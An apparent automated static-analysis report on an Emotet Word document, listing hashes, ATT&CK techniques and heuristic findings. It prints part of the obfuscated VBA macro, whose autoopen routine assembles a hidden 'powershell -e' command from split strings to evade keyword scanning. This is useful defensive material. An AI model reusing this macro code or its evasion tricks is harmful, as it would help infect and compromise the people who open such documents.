Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 c177de169b84382b…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 196.8 KB
Created: 2019-03-13 14:14:00
Authoring application: Microsoft Office Word
First seen: 2019-04-17
MD5: 39371d725db8fd73f95db33bc73119c5
SHA-1: 0067a40999cd9a9666e89d18df3ed1f15b91d408
SHA-256: c177de169b84382b1809efd361d8e5a6ee6eff262f479724856686d03c6bb6db
Risk score: 282

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro that uses obfuscation techniques, including splitting keywords like 'Win32_Process'. The presence of an 'autoopen' macro and the ClamAV detection strongly suggest Emotet, a known downloader family. The macro's likely intent is to download and execute a second-stage payload, as indicated by the 'GetObject' call and the general behavior of Emotet.

Heuristics (8)

  • ClamAV: Doc.Downloader.Emotet-7155084-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Emotet-7155084-0
  • VBA macros detected [medium, 4 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • Dangerous API name reassembled from split string literals [critical] (OLE_VBA_SPLIT_KEYWORD_OBFUSCATION)
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • GetObject call [high] (OLE_VBA_GETOBJ)
    GetObject call
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 39800 bytes
SHA-256: afbf31f61c7464d4b694cfa32a39e87acf8edd771a3354fa5507165a51540a17

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "EowcAc"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function FUA_AUAA()
   If w1BckDX1 = vB4QDcBU Then
wDACAZ = Chr(JAAxACDG)
MBAB1AD = lAABBwA + ChrW(hABAAUD) * 14394160 * CBool(238273014) + 901428152 / Round(jUAA_AQk) - s_AU_AAo + Sqr(790214161) - 708660653 * CByte(959521343)
IG4AwA = Chr(JAAAC1A)
End If
   If jD_AZk = dUAAQAX4 Then
j1xAxA = Chr(fkQACX)
jwGAQAx = t_QGAU + ChrW(ZG1XZDU) * 371501793 * CBool(390859086) + 503960022 / Round(n_A4AkcC) - S1Bxk4 + Sqr(834751436) - 422879251 * CByte(338051091)
I_QxAX = Chr(tDAQwD)
End If
   If TQUUQ_ = WZADkUA Then
oBB1DA = Chr(GCAU1A4)
YoAAQD = hUokcw + ChrW(mQUQB1A) * 815722094 * CBool(292557748) + 667875630 / Round(wAAAAk) - QZcZUxAA + Sqr(4742612) - 295449324 * CByte(119020016)
RQQwcXX = Chr(bkBAAZQ_)
End If
   If tcQwGZ = NC41cXwD Then
fAXUAQQx = Chr(s1U4_C)
wDQZUAo = G4QwUGZU + ChrW(JUQGGA) * 482907701 * CBool(981329458) + 970306336 / Round(rAUGkA) - B1AQAA + Sqr(411024489) - 777559686 * CByte(982052654)
tAGoBBX = Chr(iAAAAU1B)
End If
   If wBZ4BDAB = WADAXX Then
zBUAcQA = Chr(O_AQ4A)
jQxA_BA = aAACok + ChrW(z_XAoCA) * 152249426 * CBool(779830433) + 464704108 / Round(jBZ_cZA) - YxDXUxAc + Sqr(369711988) - 411990199 * CByte(349145057)
f_UGAA = Chr(kDAZBGQ)
End If
   If VkA4AX = H1AoAAB Then
O_141CA_ = Chr(OoGAAAxZ)
RBAAUwA = RkUXAU + ChrW(jkABACw) * 30559214 * CBool(491351503) + 469170855 / Round(Eow1AA) - BoDQ_A + Sqr(982181091) - 845004648 * CByte(883962512)
L1kDDD4X = Chr(MXAAAC)
End If
End Function
Sub autoopen()
On Error Resume Next
   If dcABZxAA = OAD1B4G Then
NDBACA = Chr(WAQAQG)
AcoQww4A = jCkkAQkC + ChrW(AAQBZAU) * 195104790 * CBool(808912127) + 682828477 / Round(IABAQkC) - hDCAADAA + Sqr(765448541) - 766538163 * CByte(849285699)
wBXAAUB = Chr(CZ1QQA)
End If
   If w_A4AA = HAcAAAQD Then
OkAZoUQ_ = Chr(LAoBwQA)
CAGc1AwA = zD_XGCwA + ChrW(VAAAAQx) * 568713067 * CBool(148733705) + 92208061 / Round(UAAA4kk) - iBGCZACX + Sqr(874021784) - 27482444 * CByte(701678321)
VA_QAQAA = Chr(E4UXAQ)
End If
   If r4Dww4 = OQ4UDAA Then
KBAZBG = Chr(VAAcUkQB)
oAAAADoA = i1wAAA + ChrW(oQACAUAB) * 497569453 * CBool(487017100) + 584916142 / Round(tCAQXQAU) - LABXkQw + Sqr(336995115) - 562228471 * CByte(90695964)
jZBAAA = Chr(VABAQDB)
End If
T_ADZ1 (UoBAGXAx + "po" + OAxcBBG + "wersh" + w4AAAA + "ell -e " + qZ_DCQ + dGAZCxcA + f1AkDQB + TBZDAUAA + hAGGGk + bXDUQA + oooQQ1AA + tAAAUDAB + scAcAA)
   If CwAABDBA = FQAAQXk Then
jX1CC4B = Chr(iQAACA)
z4x_BUD = lQBQAUAZ + ChrW(mAoXAGAQ) * 292917880 * CBool(695503559) + 448936726 / Round(I1wQAxkA) - DoAoUQAA + Sqr(151885380) - 670767308 * CByte(122810268)
FUAAkA = Chr(VoUUZGA)
End If
   If HXAAZQB = z1QD_ZQU Then
jAQA__ = Chr(LoAAAcD)
EA1xAAA = kCAA1B + ChrW(nBD1UGAA) * 621096684 * CBool(44976059) + 425353829 / Round(ocBoUQXx) - jAAAABc4 + Sqr(679603693) - 669239633 * CByte(557953984)
cDUZUcA = Chr(KACcDD4A)
End If
End Sub
Function sQ4AAw()
   If WAG1AABZ = VZAQcA Then
XA4CAADU = Chr(WoQDCAUQ)
d1UUAUAC = fAABAQ + ChrW(zUAD4QA) * 683541550 * CBool(481473103) + 60583324 / Round(TXGUAA) - AwAAcAXA + Sqr(444545254) - 690255336 * CByte(911852796)
vAQAXGAA = Chr(dU4AA4AQ)
End If
   If LAAAB_A = IoBBDQ Then
QZZAoDA = Chr(IkAAAc)
dZDQAc = ak1D1kAA + ChrW(hUAAAAA4) * 282435472 * CBool(674829054) + 325355978 / Round(vB4QAXA) - lcDAAQC + Sqr(57171376) - 509106823 * CByte(703728922)
RAAwwQAU = Chr(icUDAU)
End If
   If kwX1wZB = KBwG_D1 Then
cQADBx_ = Chr(tAUGZ4)
mXkADw = Y4AcA_ + ChrW(AQABAAA) * 827943608 * CBool(934580053) + 398760272 / Round(iQDAQwA) - c_QAAkAA + Sqr(308677029) - 758141730 * CByte(413454705)
hUB14D = Chr(wGQAZC)
End If
   If XU_cCBAB = kDAAAA1 Then
aQAAQoD = Chr(lAQAAU41)
S_AAZoQA = pokGCZC1 + ChrW(EoA_kAAQ) * 618090055 * CBool(346166531) + 702292105 / Round(WAoD4GAw) - wDB4kXwA + Sqr(330065582) - 234008707 * CByte(398849381)
PCA4AxQ =
... (truncated)